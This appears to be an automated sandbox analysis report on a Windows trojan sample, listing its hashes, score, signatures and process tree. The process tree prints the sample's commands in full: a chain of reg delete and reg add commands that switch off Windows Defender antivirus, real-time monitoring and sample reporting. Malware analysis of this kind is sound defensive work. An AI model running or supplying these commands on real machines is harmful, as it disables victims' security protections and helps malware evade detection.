Overview

overview

10

Static

static

3

82308e1070...18.exe

windows7-x64

10

82308e1070...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/05/2024, 22:37

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    82308e107068f591cff8cd7e9280589a_JaffaCakes118.exe

  • Size

    90KB

  • MD5

    82308e107068f591cff8cd7e9280589a

  • SHA1

    eb4e8cf2ed682c7ffea028140501a3c3a603abe1

  • SHA256

    8dc666d31590e5edb83eb111aef386774e8c25102042a25965ead61b26fea0fd

  • SHA512

    b59d3226dcfb4bb296d13fed7e0c778754177fca8803d2b2def5c35400df4c1ff8c696ab1967c30c243b347380bd6f5c7e3ab4e969dd000d7fe59fc186571d5b

  • SSDEEP

    1536:AM7ftfkS5g9YOms+gZcQipICdXkNDqLLZX9lItVGL++eIOlnToIfOw+OF:ACFfHgTWmCRkGbKGLeNTBfO2

Score
10/10
evasiontrojan

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
    evasiontrojan
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\82308e107068f591cff8cd7e9280589a_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\82308e107068f591cff8cd7e9280589a_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1616
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\80A.tmp\81A.tmp\82B.bat C:\Users\Admin\AppData\Local\Temp\82308e107068f591cff8cd7e9280589a_JaffaCakes118.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1820
      • C:\Windows\system32\reg.exe
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        3⤵
          PID:1848
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
          3⤵
            PID:2928
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
            3⤵
              PID:4008
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
              3⤵
                PID:2140
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:8
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:1460
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:224
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:2260
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:3512
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                3⤵
                  PID:924
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                  3⤵
                    PID:1776
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                    3⤵
                      PID:1752
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                      3⤵
                        PID:4180
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3936 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
                    1⤵
                      PID:440

                    Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Temp\80A.tmp\81A.tmp\82B.bat
                            Filesize

                            1KB

                            MD5

                            509170ad1804d3092fa6c5cf530e017f

                            SHA1

                            3fb5b0dee2231ef6e7d0f71b6af5b298f109c2c4

                            SHA256

                            7a1f7876c4cdbc2010f08f143347f6c037c558ff57a3209cb5a56644e385280d

                            SHA512

                            ef12b29934cb19fe87e7014f6cbd22e23c1b77f3841ecd06b980e72d6c067f9b1a32524b5985c70f1537cecbad8286a73925de3b87e396cf19bb6580e828ee58

                            Download Submit